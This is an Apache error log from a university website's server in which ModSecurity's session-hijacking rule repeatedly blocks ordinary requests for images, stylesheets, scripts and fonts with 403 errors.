[Mon Aug 28 08:25:18.566637 2023] [:error] [pid 37539] [client 114.122.77.204] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/img/ori/nurtriana.png"] [unique_id "ZOv3fsCo-f0AAJKjaKEAAAAG"]
[Mon Aug 28 08:25:18.566930 2023] [:error] [pid 38389] [client 114.122.77.204] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/bootstrap-datepicker/js/bootstrap-datepicker.js"] [unique_id "ZOv3fsCo-f0AAJX1kh8AAAAS"]
[Mon Aug 28 08:25:18.611620 2023] [:error] [pid 38149] [client 114.122.77.204] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/img/ori/kampus_mengajar_2023.png"] [unique_id "ZOv3fsCo-f0AAJUFNdsAAAAA"]
[Mon Aug 28 08:25:18.615118 2023] [:error] [pid 38379] [client 114.122.77.204] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/img/fh-link.png"] [unique_id "ZOv3fsCo-f0AAJXrIs8AAAAP"]
[Mon Aug 28 08:25:18.615492 2023] [:error] [pid 37539] [client 114.122.77.204] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/img/fe-link.png"] [unique_id "ZOv3fsCo-f0AAJKjaKIAAAAG"]
[Mon Aug 28 08:25:18.668200 2023] [:error] [pid 38389] [client 114.122.77.204] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/fonts/glyphicons-halflings-regular.woff2"] [unique_id "ZOv3fsCo-f0AAJX1kiAAAAAS"]
[Mon Aug 28 08:25:18.668256 2023] [:error] [pid 38386] [client 114.122.77.204] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/img/fisip-link.png"] [unique_id "ZOv3fsCo-f0AAJXyN7sAAAAM"]
[Mon Aug 28 08:25:18.677286 2023] [:error] [pid 38379] [client 114.122.77.204] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/img/fkip-link.png"] [unique_id "ZOv3fsCo-f0AAJXrItAAAAAP"]
[Mon Aug 28 08:25:18.698702 2023] [:error] [pid 38338] [client 114.122.77.204] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/js/jquery.min.js"] [unique_id "ZOv3fsCo-f0AAJXCvwgAAAAJ"]
[Mon Aug 28 08:25:18.734471 2023] [:error] [pid 37539] [client 114.122.77.204] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/img/pasca-link.png"] [unique_id "ZOv3fsCo-f0AAJKjaKMAAAAG"]
[Mon Aug 28 08:25:18.734751 2023] [:error] [pid 38386] [client 114.122.77.204] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/fonts/glyphicons-halflings-regular.woff"] [unique_id "ZOv3fsCo-f0AAJXyN7wAAAAM"]
[Mon Aug 28 08:25:18.734850 2023] [:error] [pid 38379] [client 114.122.77.204] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/img/ft-link.png"] [unique_id "ZOv3fsCo-f0AAJXrItEAAAAP"]
[Mon Aug 28 08:25:18.757418 2023] [:error] [pid 38114] [client 114.122.77.204] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/gfx/theme1/banner/akademik.png"] [unique_id "ZOv3fsCo-f0AAJTinlEAAAAE"]
[Mon Aug 28 08:25:18.758139 2023] [:error] [pid 38379] [client 114.122.77.204] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/gfx/theme1/banner/pendaftaran_online.png"] [unique_id "ZOv3fsCo-f0AAJXrItIAAAAP"]
[Mon Aug 28 08:25:18.770430 2023] [:error] [pid 38059] [client 114.122.77.204] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/img/login-email-unla.png"] [unique_id "ZOv3fsCo-f0AAJSr25kAAAAO"]
[Mon Aug 28 08:25:18.816246 2023] [:error] [pid 37539] [client 114.122.77.204] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/fonts/glyphicons-halflings-regular.ttf"] [unique_id "ZOv3fsCo-f0AAJKjaKQAAAAG"]
[Mon Aug 28 08:25:18.816307 2023] [:error] [pid 38379] [client 114.122.77.204] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/img/digilib-logo.png"] [unique_id "ZOv3fsCo-f0AAJXrItMAAAAP"]
[Mon Aug 28 08:25:18.822316 2023] [:error] [pid 38149] [client 114.122.77.204] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/gfx/theme1/banner/rekrut_dosen.jpg"] [unique_id "ZOv3fsCo-f0AAJUFNdwAAAAA"]
[Mon Aug 28 08:25:18.935355 2023] [:error] [pid 38386] [client 114.122.77.204] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOv3fsCo-f0AAJXyN70AAAAM"]
[Mon Aug 28 08:25:19.499108 2023] [:error] [pid 38059] [client 36.90.158.79] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOv3f8Co-f0AAJSr25oAAAAO"]
[Mon Aug 28 08:25:44.927067 2023] [:error] [pid 38065] [client 36.90.158.79] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/"] [unique_id "ZOv3mMCo-f0AAJSxY7cAAAAH"]
[Mon Aug 28 08:25:44.952427 2023] [:error] [pid 38379] [client 36.90.158.79] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOv3mMCo-f0AAJXrItQAAAAP"]
[Mon Aug 28 08:26:14.771719 2023] [:error] [pid 38065] [client 180.253.178.178] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/img/ori/prof_hennie.png"] [unique_id "ZOv3tsCo-f0AAJSxY7sAAAAH"]
[Mon Aug 28 08:26:15.468027 2023] [:error] [pid 38303] [client 180.253.178.178] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOv3t8Co-f0AAJWfZOoAAAAI"]
[Mon Aug 28 08:26:28.859300 2023] [:error] [pid 38114] [client 202.80.213.140] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/css/bootstrap.min.css"] [unique_id "ZOv3xMCo-f0AAJTinlQAAAAE"]
[Mon Aug 28 08:26:28.871233 2023] [:error] [pid 38303] [client 202.80.213.140] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/bootstrap-datepicker/css/bootstrap-datepicker3.css"] [unique_id "ZOv3xMCo-f0AAJWfZOsAAAAI"]
[Mon Aug 28 08:26:28.910598 2023] [:error] [pid 38114] [client 202.80.213.140] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/css/unla.css"] [unique_id "ZOv3xMCo-f0AAJTinlUAAAAE"]
[Mon Aug 28 08:26:28.911081 2023] [:error] [pid 38065] [client 202.80.213.140] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/img/logo-unla-mobile.png"] [unique_id "ZOv3xMCo-f0AAJSxY7wAAAAH"]
[Mon Aug 28 08:26:28.912927 2023] [:error] [pid 38149] [client 202.80.213.140] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/img/ori/prof_hennie.png"] [unique_id "ZOv3xMCo-f0AAJUFNd8AAAAA"]
[Mon Aug 28 08:26:28.912950 2023] [:error] [pid 38386] [client 202.80.213.140] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/img/logo-unla.png"] [unique_id "ZOv3xMCo-f0AAJXyN8EAAAAM"]
[Mon Aug 28 08:26:28.946674 2023] [:error] [pid 38114] [client 202.80.213.140] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/img/ori/upacara_hutri2023.png"] [unique_id "ZOv3xMCo-f0AAJTinlYAAAAE"]
[Mon Aug 28 08:26:28.946716 2023] [:error] [pid 38303] [client 202.80.213.140] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/bootstrap-datepicker/css/bootstrap-datepicker3.css"] [unique_id "ZOv3xMCo-f0AAJWfZOwAAAAI"]
[Mon Aug 28 08:26:28.970412 2023] [:error] [pid 38149] [client 202.80.213.140] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/img/ori/ratri_tiara2023.png"] [unique_id "ZOv3xMCo-f0AAJUFNeAAAAAA"]
[Mon Aug 28 08:26:28.981644 2023] [:error] [pid 38386] [client 202.80.213.140] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/js/jquery.min.js"] [unique_id "ZOv3xMCo-f0AAJXyN8IAAAAM"]
[Mon Aug 28 08:26:28.989294 2023] [:error] [pid 38065] [client 202.80.213.140] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/js/bootstrap.min.js"] [unique_id "ZOv3xMCo-f0AAJSxY70AAAAH"]
[Mon Aug 28 08:26:28.996661 2023] [:error] [pid 38303] [client 202.80.213.140] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/bootstrap-datepicker/js/bootstrap-datepicker.js"] [unique_id "ZOv3xMCo-f0AAJWfZO0AAAAI"]
[Mon Aug 28 08:26:29.033222 2023] [:error] [pid 38114] [client 202.80.213.140] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/css/unla.css"] [unique_id "ZOv3xcCo-f0AAJTinlcAAAAE"]
[Mon Aug 28 08:26:29.033580 2023] [:error] [pid 38065] [client 202.80.213.140] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/img/ori/nurtriana.png"] [unique_id "ZOv3xcCo-f0AAJSxY74AAAAH"]
[Mon Aug 28 08:26:29.042978 2023] [:error] [pid 38149] [client 202.80.213.140] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/img/fh-link.png"] [unique_id "ZOv3xcCo-f0AAJUFNeEAAAAA"]
[Mon Aug 28 08:26:29.045494 2023] [:error] [pid 38303] [client 202.80.213.140] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/img/fe-link.png"] [unique_id "ZOv3xcCo-f0AAJWfZO4AAAAI"]
[Mon Aug 28 08:26:29.046450 2023] [:error] [pid 38386] [client 202.80.213.140] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/img/fisip-link.png"] [unique_id "ZOv3xcCo-f0AAJXyN8MAAAAM"]
[Mon Aug 28 08:26:29.048697 2023] [:error] [pid 37539] [client 202.80.213.140] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/img/ori/kampus_mengajar_2023.png"] [unique_id "ZOv3xcCo-f0AAJKjaKgAAAAG"]
[Mon Aug 28 08:26:29.105648 2023] [:error] [pid 38149] [client 202.80.213.140] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/img/fkip-link.png"] [unique_id "ZOv3xcCo-f0AAJUFNeIAAAAA"]
[Mon Aug 28 08:26:29.106774 2023] [:error] [pid 38059] [client 202.80.213.140] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/img/ft-link.png"] [unique_id "ZOv3xcCo-f0AAJSr25wAAAAO"]
[Mon Aug 28 08:26:29.123530 2023] [:error] [pid 38065] [client 202.80.213.140] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/img/pasca-link.png"] [unique_id "ZOv3xcCo-f0AAJSxY78AAAAH"]
[Mon Aug 28 08:26:29.124141 2023] [:error] [pid 38114] [client 202.80.213.140] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/gfx/theme1/banner/akademik.png"] [unique_id "ZOv3xcCo-f0AAJTinlgAAAAE"]
[Mon Aug 28 08:26:29.129082 2023] [:error] [pid 37539] [client 202.80.213.140] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/gfx/theme1/banner/pendaftaran_online.png"] [unique_id "ZOv3xcCo-f0AAJKjaKkAAAAG"]
[Mon Aug 28 08:26:29.129509 2023] [:error] [pid 38386] [client 202.80.213.140] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/img/login-email-unla.png"] [unique_id "ZOv3xcCo-f0AAJXyN8QAAAAM"]
[Mon Aug 28 08:26:29.162124 2023] [:error] [pid 38303] [client 202.80.213.140] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/gfx/theme1/banner/rekrut_dosen.jpg"] [unique_id "ZOv3xcCo-f0AAJWfZO8AAAAI"]
[Mon Aug 28 08:26:29.163445 2023] [:error] [pid 38059] [client 202.80.213.140] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/img/digilib-logo.png"] [unique_id "ZOv3xcCo-f0AAJSr250AAAAO"]
[Mon Aug 28 08:26:29.217425 2023] [:error] [pid 38149] [client 202.80.213.140] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/js/jquery.min.js"] [unique_id "ZOv3xcCo-f0AAJUFNeMAAAAA"]
[Mon Aug 28 08:26:29.304442 2023] [:error] [pid 38114] [client 202.80.213.140] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOv3xcCo-f0AAJTinlkAAAAE"]
[Mon Aug 28 08:27:01.977557 2023] [:error] [pid 38059] [client 103.147.8.134] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/index.php/c_mastah/grid_vstsemester"] [unique_id "ZOv35cCo-f0AAJSr254AAAAO"]
[Mon Aug 28 08:27:02.790720 2023] [:error] [pid 37539] [client 103.147.8.134] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/index.php/c_tools/get_user"] [unique_id "ZOv35sCo-f0AAJKjaKsAAAAG"]
[Mon Aug 28 08:27:49.246466 2023] [:error] [pid 38386] [client 114.142.173.4] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/css/reset-min.css"] [unique_id "ZOv4FcCo-f0AAJXyN8gAAAAM"]
[Mon Aug 28 08:27:49.249465 2023] [:error] [pid 38389] [client 114.142.173.4] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/css/style.css"] [unique_id "ZOv4FcCo-f0AAJX1kiQAAAAS"]
[Mon Aug 28 08:27:49.335642 2023] [:error] [pid 38059] [client 114.142.173.4] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/css/jquery.fancybox-1.3.4.css"] [unique_id "ZOv4FcCo-f0AAJSr26EAAAAO"]
[Mon Aug 28 08:27:49.339307 2023] [:error] [pid 38379] [client 114.142.173.4] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/css/ddsmoothmenu.css"] [unique_id "ZOv4FcCo-f0AAJXrItgAAAAP"]
[Mon Aug 28 08:27:49.352015 2023] [:error] [pid 38149] [client 114.142.173.4] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/css/nivo-slider.css"] [unique_id "ZOv4FcCo-f0AAJUFNecAAAAA"]
[Mon Aug 28 08:27:49.361398 2023] [:error] [pid 38462] [client 114.142.173.4] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/css/gallery_album.css"] [unique_id "ZOv4FcCo-f0AAJY@OnEAAAAB"]
[Mon Aug 28 08:27:49.362548 2023] [:error] [pid 38389] [client 114.142.173.4] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/js/ext/resources/css/ext-all.css"] [unique_id "ZOv4FcCo-f0AAJX1kiUAAAAS"]
[Mon Aug 28 08:27:49.363594 2023] [:error] [pid 38386] [client 114.142.173.4] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/js/ext/resources/css/xtheme-gray.css"] [unique_id "ZOv4FcCo-f0AAJXyN8kAAAAM"]
